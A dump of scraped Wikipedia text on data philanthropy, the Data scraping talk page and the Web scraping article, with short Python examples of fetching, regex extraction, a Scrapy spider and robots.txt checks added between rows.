125 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_philanthropy | Data philanthropy describes a form of collaboration in which private sector companies share data for public benefit. 1 There are multiple uses of data philanthropy being explored from humanitarian, corporate, human rights, and academic use. Since introducing the term in 2011, the United Nations Global Pulse has advocated for a global "data philanthropy movement". 2 A large amount of data collected from the Internet comes from user-generated content. This includes blogs, posts on social networks, and information submitted in forms. Besides user-generated data, corporations are also currently mining data from consumers in order to understand customers, identify new markets, and make investment decisions. Kirkpatrick, the Director at United Nations Global Pulse, labelled this data "massive passive data" or "data exhaust". 3 Data philanthropy is the idea that something positive can come from this overload of data. Data philanthropy is defined as the private sector sharing this data in ways that the public can benefit. 1 The term philanthropy helps to emphasize that data sharing is a positive act and that the shared data is a public good. 3 A challenge that comes with sharing data is the Internet privacy of the user whose data is being used. Mathematical techniques (differential privacy and space time boxes) have been introduced in order to make personal data accessible, while providing the users such data with anonymity. But even if these algorithms work, there is always the possibility and fear of re-identification. 1 The other challenge is convincing corporations to share their data. The big data that corporations collect provides them with market competitiveness. They are able to infer meaning regarding consumer behaviour. The fear is that by sharing all their information, they may lose their competitive edge. 1 Furthermore, numerous moral challenges are encountered. One proposal on how to solve these moral challenges has been brought to light by Mariarosaria Taddeo in 2016, providing an ethical framework that aims to address them. 4 The goal of data philanthropy is to create a global data commons where companies, governments, and individuals can contribute anonymous, aggregated datasets. 2 The United Nations Global Pulse offers four different tactics that companies can use to share their data that preserve consumer anonymity. These include: 1 By providing these four tactics, United Nations Global Pulse hopes to provide initiative and options for companies to share their data with the public. By using data gathered from social media, cell phones, and other communication modes, health researchers have been able to track the spread of diseases. 5 In the United States, HealthMap, is using data philanthropy related tactics to track the outbreak of diseases. HealthMap analyses data from publicly available media sources such as news websites, government alerts, and social media sites like X (formerly known as Twitter) for outbreaks of various illnesses around the world. 5 6 Another website, Flu Near You, allows users to report their own health status on a weekly basis. Traditional flu surveillance can take up to 2 weeks to confirm outbreaks. 5 Doctors must wait for a virological test to confirm the outbreak before reporting it to the Centers for Disease Control. 
This form of data philanthropy allows for up to date information regarding various health concerns by using publicly available information gathered from news outlets, government alerts, and social media sites. It is the data gathered on social media sites, where users are not aware of their data being mined that leads to HealthMap and Flu Near You being considered data philanthropy. 5 The Centers for Disease Control and Prevention collaborated with Google and launched Google Flu Trends in 2008, a website that tracks flu-related searches and user location to track the spread of the flu. Users can visit the website to compare the amount of flu-related search activity versus the reported numbers of flu outbreaks on a graphic map. The difficulty with this method of tracking is that Google searched are sometimes performed due to curiosity rather than because an individual is suffering from the flu. According to Ashley Fowlkes, an epidemiologist in the CDC Influenza division, "the Google Flu Trends system tries to account for that type of media bias by modelling search terms over time to see which ones remain stable". 5 Google Flu Trends is no longer publishing current flu estimates on the public website. Visitors to the site can still view and download previous estimates. Current data can be shared with verified researchers. 7 A study by Harvard School of Public Health (HSPH) released in the October 12, 2012 issues of the journal Science discussed how phone data helped curb the spread of malaria in Kenya. The researchers mapped phone calls and texts made by 14,816,521 Kenyan mobile phone subscribers. 8 When individuals left their primary living location the destination and length of journey was calculated. This data was then compared to a 2009 malaria prevalence map to estimate the disease's commonness in each location. Combining all this information, the researchers can estimate the probability of an individual carrying malaria and map the movement of the disease. This research can be used to track the spread of similar diseases. 8 Through data philanthropy 'big data' corporations such as social networking sites, telecommunication companies, search engines amongst others, collect and make user generated information available to a data sharing system. This also permits institutions to give back to a beneficial cause. With the onset of technological advancements, sharing data on a global scale and an in-depth analysis of these data structures could alter the reaction towards certain occurrences, be it natural disasters, epidemics, worldwide economic problems and many other events. Some analyst have argued 9 that this aggregated Information is beneficial for the common good and can lead to developments in research and data production in a range of varied fields. 9 Calling patterns of mobile phone users can determine the socioeconomic standings of the populace which can be used to deduce "its access to housing, education, healthcare, and basic services such as water and electricity". 9 Researchers from Columbia University and Karolinska Institute utilize information from mobile phone providers, in order to assist in the dispersal of resources by deducing the movement of those displaced by natural disasters. Big data can also provide information on looming disasters and can assist relief organizations in rapid response and locating displaced individuals. 
By analysing certain patterns within this 'big data', could successfully transform the response to destructive occurrences like natural disasters, outbreaks of diseases and global economic distress, by employing real-time information to achieve a comprehension of the welfare of individuals. Corporations utilize digital services, such as human sensor systems to detect and solve impending problems within communities. This is a strategy implemented by the private sector in order to protect its citizens by anonymously dispersing customer information to the public sector, whilst also ensuring the protection of their privacy. 9 Poverty still remains a worldwide issue with over 2.5 billion people 10 currently impoverished. Accumulating accurate data has been a complex issue but developments in technology and utilising 'big data', 10 is one solution for improving this situation. Statistics indicate the widespread use of mobile phones, even within impoverished communities. This availability could prove vital in gathering data on populations living in poverty. Additional data can be collected through Internet access, social media, utility payments and governmental statistics. Data-driven activities can lead to the cumulation of 'big data', which in turn can assist international non-governmental organization in documenting and evaluating the needs of underprivileged populations. Through data philanthropy, NGO's can distribute information whilst cooperating with governments and private companies. 10 Data philanthropy incorporates aspects of social philanthropy by permitting corporations to create profound impacts through the act of giving back by dispersing proprietary datasets. 11 The public sector, is faced with an unequal and limited access to the frequency of data and they also produce, collect and preserve information, which has proven to be an essential asset. Company's track and analyse users online activities, so as to gain more insight into their needs in relation to new products and services. 12 These companies view the welfare of the population as a vital key to the expansion and progression of businesses by using their data to places a spotlight on the plight of global citizens. 9 Experts in the private sector contend the importance of merging various data streams such as retail, mobile phone and social media data to create necessary solutions to handle global issues. Despite the inevitable risk of sharing private information, it works in a beneficial manner and serves the interest of the public. 13 The digital revolution causes an extensive production of 'big data' that is user-generated and available on the web. Corporations accumulate information on customer preferences through the digital services they utilize and products they purchase, in order to gain a clear insight on their clientele and future market opportunities. 9 However the rights of individuals concerning privacy and ownership of data are a controversial issue as governments and other institutions can use this collective data for other unethical purposes. Companies monitor and probe consumer online activities in order to better comprehend and develop tailored needs for their clientele and in turn increase their profits. 14 Data philanthropy plays an important role in academia. Researchers encounter countless obstacles whilst attempting to access data. 
This data is available to a limited number of researchers with sole access to restricted resources who are authorized to utilize this information; like social media streams enabling them to produce more knowledge and develop new studies. For example, Twitter markets access to its real-time APIs at exorbitant prices, which often surpasses the budgets of most researchers. 'Data grants' 14 is a trial program created by Twitter that provides a selective number of academics and researchers with access to real-time databases in order to garner further knowledge. They apply to gain entry into vast data downloads, on specific topics. 14 Data philanthropy aids the human rights movement, by assisting in the dispersal of evidence for truth commissions and war crimes tribunals. Proponents of human rights accumulate data on abuse occurring within states, which is then used for scientific analysis and propels awareness and action. For example, non-profit organizations compile data from Human Rights monitors in war zones in order to assist the UN High Commissioner for Human Rights. It uncovers inconsistencies in the number of casualties of war, which in turn leads to international attention and exerts influence on discussions relating to global policy. 14 |
126 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Talk:Data_scraping | Pappa, I noticed that you wrote about some Perl modules. Are these modules for screen scraping. If so we could include the better ones in the article. JesseHogan 01:44, 9 Dec 2004 (UTC) I dispute the notion that screen scraping is relegated to just reading HTML. I've done work on the BlackBerry (J2ME) that required screenscraping solutions... DoomBringer 02:21, 28 May 2005 (UTC) reply As a layman, I'm still confused. Are there examples that could be linked? Nick Douglas 05:24, 18 September 2005 (UTC) reply I too see Screen Scraping and Web Scraping as separate topics. I've just completed two applications that use Screen Scraping techniques to interface with a legacy system that was not web-based. —Preceding unsigned comment added by 64.90.21.3 (talk contribs) 15:55, 28 December 2006 The article was starting to collect link spam. There were several links to implementations which didn't really add information about scraping (there were just another implementation), or were outright commercial products. In order to avoid POV problems regarding external links, I have removed all external links to implementations which do not also include substantial information on how scraping works in general and how the implementation works in particular. I have also placed HTML comments in the article about this. Others can, of course, add what they want, but I've requested that people here explain their reasoning on why a link should be included. DragonHawk 13:42, 6 January 2006 (UTC) reply There was an external link that had been added to a purported example with code. But the example showed no code, just a harvested page. If you want to re-instate that link, make sure it shows the scraping code, as the link suggested. Also, log in to show your name and provide a way for this feedback to be given. peterl 11:03, 27 February 2007 (UTC) reply On 20:43, 21 January 2006, an anonymous user added a link to Box-A-Web. No edit summary was given, but the contributor included the link description "Not an article on how to do it in Ruby, but rather a technology demonstrator for drag and drop web scraping using Ruby on Rails Framework". Investigation: I visited the website in question to check it out. Adverts down the left side. Account required to use. Free registration (no fees). Guest accounts published. Tutorial explains how to use it, but little about how it works does make an analogy of XML and RSS to HTML and this tool. Text on tutorial page "as the service is free (currently ) implies it may or will become commercial in the future. Conclusion: Reverted. Contains no information on web scraping. Adds nothing to the substance of the article. Anonymous contribution makes discussion with contributor impossible. DragonHawk 01:00, 24 January 2006 (UTC) reply I just discovered that Web scraping has its own article, separate from Screen scraping. I propse merging the content from the Web scraping article into the Web scraping section of the Screen scraping article. The term "web scraping" is derrived from "screen scraping", and the two are closely related in operation, so it makes sense, to me. DragonHawk 13:57, 27 June 2006 (UTC) reply Please see my clarification in the Web scraping content. —Preceding unsigned comment added by Stefanandr (talk contribs) 16:56, 30 June 2006 Bunyip responds... This subject area is actually bigger than "Ben Hur". In a nutshell... 
"Screen Scraping" is a form of "Harvesting" but which is not defined in Wikipedia in the computer sense. We need to start with a description of "Harvesting" and or "Web Harvesting": "Web Harvesting" is any software technique in which a software "robot" ("webbot", "crawler" (etc)) "trawls" (ie recursively downloads a page and all the page links in it to a nominated depth) any number of possibly targetted web sites for a variety of reasons, whether legitimate or not. "Web Harvesting" can be done to index web pages for search engines, to hunt for email addresses, phone account numbers or passwords, to collect metadata, or to perform a http based archive (Eg: http: www.archive.org). We can then describe Screen Scraping somewhat thusly: When a human downloads a web page, it is called "browsing". When a computer program records an electronic copy of the textual data on a computer screen, it is called "screen scraping". A "screen scrape" is an electronic copy of the text that a human would have seen on the screen at the time, usually retaining top-bottom, left-right sequence, but it is not an image of the screen. "screen scraping" includes only expressly textual information, and exludes text appearing in image data. The computer program that performs the "screen scrape" is called a "robot". "Screen Scraping" can be used on web sites to collect the html text of the web page. "Screen Scraping" is still very common in high security mainframe-internet interfaces as a robust and inpenetrable (albeit crude) way of sending data from a secure server directly to public and insecure clients. Because the data from the server is static and mostly one way this prevents opportunities for injected code, buffer overflow conditions, or hacking attempts from rogue clients. "Screen Scraping" typically occurs multiple times on the same communication interface. We can now describe the association between the two as follows: "Web Scraping" differs from "Screen Scraping" in that the former occurs only once per web page over many different web pages. Recursively "web scraping" by following links to other pages over many web sites is "web harvesting". "web harvesting" is necessarily performed by "robots", often called "webbots", "crawlers", "harvesters" or "spiders" with similar arachnological analogies used to refer to other creepy-crawly aspects of their functions. Rightly or wrongly "web harvesters" are typically demonised as being for malicious purposes, while "webbots" are typecast as having benevolent purposes. In Australia, The Spam Act 2003 outlaws some forms of "web harvesting". 15:59, 5 September 2006 (UTC)Abunyip This definition of "screen scraping" raises questions for the "web" usage of the term. The article describes "screen scraping" on very old systems where it's done by reading a terminal's memory through an auxilliary port, and then it describes HTML parsing which has nothing whatsoever to do with screens, and calls it "screen" scraping. On the modern PC, a "screen scraping" program would have to be one that somehow reads the contents of a program's graphical window to get at the data. For example, a Web robot is not a screen scraper, but a program that somehow reads the data from an open Firefox window is. 75.186.36.20 (talk) 04:55, 9 February 2008 (UTC) reply IMHO, most of this article should be moved to the 'Data scraping' article (which is currently only a redirect), and screen scraping and web scraping mentioned as particular implementations of the former. 
Uker (talk) 15:07, 8 June 2009 (UTC) reply The page currently says: "These include the blocking of individual and ranges of IP addresses, which stops the majority of "cookie cutter" screen scraping applications. Added section to web scraping on stopping bots. peterl 04:41, 12 February 2007 (UTC) reply This page should point out that screen scraping is against the Terms of Use of many perhaps most commercial websites, which leads to legal liability for the scraper. Indeed, the Digital Millennium Copyright Act in the USA and European Union Copyright Directive specifically address "Circumvention of Copyright Protection Schemes", which would impact anyone scraping commercial sites whether for commercial gain or not especially when the scraped data is then redistributed. Commercial sites will aggressively protect their intellectual property, and often have little tolerance for screen scraping, especially where it impacts their commerce. As most legal force is exerted out of the public eye (and also outside of any official lawsuit) it may not be readily apparent just how vigorously commercial websites can act to protect their IP. Those considering screen scraping a commercial site should study its Terms of Use, and also consider the consequences should the site become aware that the scraping is occurring. I propose language similar to the above, adapted for entry use. Comments? Dracogen 16:55, 21 March 2007 (UTC) reply Data extraction) has been a persistent target of spammers. The commercial link was typically labeled "Know About Screen Scraping" in the See Also section. It has been removed and replaced several times. history Mrnatural (talk) 19:07, 5 August 2009 (UTC) reply Somewhat intermediate betweentrue "screen scrapers" in the modern sense, which interface with GUIs of applications, and consequently need either OCR to read the bitmapped screen directly and convert to text, or access to the underlying data objects, and HTML parsers would be something that takes already-rendered textual output from lynx and tries to figure out what it is seeing, basically tries to infer the underlying HTML to some degree. Some wiki expert, please find an appropriate place to put this topic in this wiki page, either as a new section between "2 Screen scrapers" and "3 Web scrapers, or as a sub-part of one of those two sections. IMO renaming section 2 to read "Application-UI scrapers", with sub-sections "2.1 General" "2.2 GUI scrapers" "2.3 "Standard output scrapers" would be make the most sense. Section 2.3 would include scraping any of: PTY output, or sub-process pipe stdout, or true pipe output, or Unix command-line vertical-bar piping, or TELNET output, etc. Scraping is often viewed as a way to get around web site attempts to "protect" data. I've gotten into these battles with a number of people and encourage anyone working on this to site some of these pieces or reliable refs therein, OTS needs API cygwin api comments outdated summary bio discussion on API request for SEC API These topics sometimes come up on the itext mail list as pdf authors seem to be the most prone to creating "protected" documents that are difficult to use with computers. Thanks. 
Nerdseeksblonde (talk) 17:26, 24 August 2009 (UTC) reply I guess I'd be thinking about reliable sources that discuss reasons why data scraping is even needed ( it sounds silly) and that would naturally lead to issues with commercial sites that are supported with ads that have no value if no one is exposed to them, to things like concern for slowing public awareness of the contents of required public filings ( everything from building permits to SEC filings could be an issue here but the SEC is at least making machine readable documents available, if not a complete automated API). I'm not sure how ever if these topics get much beyond forums and blogs. Also not entirely sure it is an encyclopedic issue. Nerdseeksblonde (talk) 23:57, 24 August 2009 (UTC) reply I merged Report mining into this article. Reyk YO 21:42, 3 April 2013 (UTC) reply Hello fellow Wikipedians, I have just modified one external link on Data scraping. Please take a moment to review my edit. If you have any questions, or need the bot to ignore the links, or the page altogether, please visit this simple FaQ for additional information. I made the following changes: When you have finished reviewing my changes, you may follow the instructions on the template below to fix any issues with the URLs. This message was posted before February 2018. After February 2018, "External links modified" talk page sections are no longer generated or monitored by InternetArchiveBot. No special action is required regarding these talk page notices, other than regular verification using the archive tool instructions below. Editors have permission to delete these "External links modified" talk page sections if they want to de-clutter talk pages, but see the RfC before doing mass systematic removals. This message is updated dynamically through the template source check (last update: 5 June 2024). Cheers.—InternetArchiveBot (Report bug) 06:28, 5 September 2017 (UTC) reply |
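One of the talk-page comments in the row above distinguishes true GUI "screen scrapers" from tools that work on the already-rendered textual output of a text-mode browser such as lynx. As an illustration only (this is not part of the notebook's own pipeline, and it assumes the lynx browser is installed and on the PATH), a minimal sketch of that rendered-output approach in Python:

import subprocess

def dump_rendered_text(url):
    # Let a text-mode browser lay the page out, then capture its standard output.
    # -dump writes the formatted page to stdout; -nolist suppresses the trailing link list.
    result = subprocess.run(
        ["lynx", "-dump", "-nolist", url],
        capture_output=True, text=True, timeout=30, check=True,
    )
    return result.stdout

print(dump_rendered_text("https://example.com")[:500])

This sits between parsing raw HTML and scraping a graphical screen, which is exactly the middle ground the comment describes.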
128 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#AI-powered_document_understanding | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
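The scraped Web scraping article in the row above opens by splitting scraping into fetching (downloading a page) and extraction (copying data out of it, for example contact scraping). A minimal sketch of that two-step split, using the requests and BeautifulSoup libraries already imported at the top of this notebook; the URL is a placeholder:

import requests
from bs4 import BeautifulSoup

def fetch(url):
    # Fetching: download the raw HTML, as a browser does when a user views a page.
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    return response.text

def extract_links(html):
    # Extraction: parse the fetched markup and copy out the pieces of interest,
    # here each hyperlink's visible text and target URL.
    soup = BeautifulSoup(html, "html.parser")
    return [(a.get_text(strip=True), a["href"]) for a in soup.find_all("a", href=True)]

for text, href in extract_links(fetch("https://example.com")):
    print(text, "->", href)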
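The same row also describes the "grep-style" approach: pulling fields out of raw markup with regular expressions instead of a parser. A hedged sketch using Python's re module, which this notebook already imports; the sample markup and patterns are illustrative, and the approach is quick to write but brittle compared with DOM parsing:

import re

sample_html = """
<p>Contact sales@example.com or support@example.com.</p>
<p>Current price: $19.99 (was $24.99).</p>
"""

# Regular-expression matching extracts fields straight from the raw markup.
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", sample_html)
prices = re.findall(r"\$\d+(?:\.\d{2})?", sample_html)

print(emails)  # ['sales@example.com', 'support@example.com']
print(prices)  # ['$19.99', '$24.99']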
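Among the tools the row surveys, Scrapy takes a framework approach: you define a spider class and the engine handles request scheduling, deduplication, and output. A minimal sketch, close to the framework's own tutorial spider, against the public quotes.toscrape.com practice site (Scrapy is not installed by this notebook's setup cells):

import scrapy

class QuotesSpider(scrapy.Spider):
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]

    def parse(self, response):
        # Yield one record per quote block on the page.
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        # Follow the pagination link; Scrapy schedules and deduplicates the requests.
        next_page = response.css("li.next a::attr(href)").get()
        if next_page is not None:
            yield response.follow(next_page, callback=self.parse)

Saved as quotes_spider.py, this can be run with: scrapy runspider quotes_spider.py -o quotes.json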
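The row ends with a truncated list of measures an administrator can use to stop or slow a bot. Without guessing at the items cut off above, one closely related and widely used convention is robots.txt, which a well-behaved scraper can honor from the client side using only the standard library; a sketch (the user agent string and URLs are placeholders):

from urllib import robotparser

rp = robotparser.RobotFileParser()
rp.set_url("https://en.wikipedia.org/robots.txt")
rp.read()

# Ask whether this user agent may fetch a given path before scraping it.
user_agent = "ExampleScraperBot"
print(rp.can_fetch(user_agent, "https://en.wikipedia.org/wiki/Web_scraping"))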
